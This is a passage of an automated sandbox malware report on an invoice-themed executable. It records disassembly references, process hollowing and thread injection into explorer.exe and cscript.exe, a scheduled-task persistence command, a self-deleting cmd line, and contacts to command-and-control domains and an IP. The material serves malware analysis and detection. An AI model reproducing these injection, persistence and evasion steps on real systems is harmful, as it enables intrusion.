            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048135A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048161A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048161A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04811DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04811DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04811DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048741E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04898DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0486A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04814D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04814D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04814D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04823D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04863540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04807D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048646A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04828EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0489FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048136CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048116E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04803A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0489FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04874257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0489B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0489B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0489D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048237F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04813B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04813B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040ACF0 LdrLoadDll,
            Source: C:\Users\user\Desktop\Factura de proforma.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.aminobalm.com
            Source: C:\Windows\explorer.exeDomain query: www.palmonlae.space
            Source: C:\Windows\explorer.exeNetwork Connect: 13.209.99.177 80
            Sample uses process hollowing techniqueShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 260000
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3352
            Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3352
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000007.00000000.362766747.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000007.00000000.337688862.00000000087C2000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Users\user\Desktop\Factura de proforma.exe VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
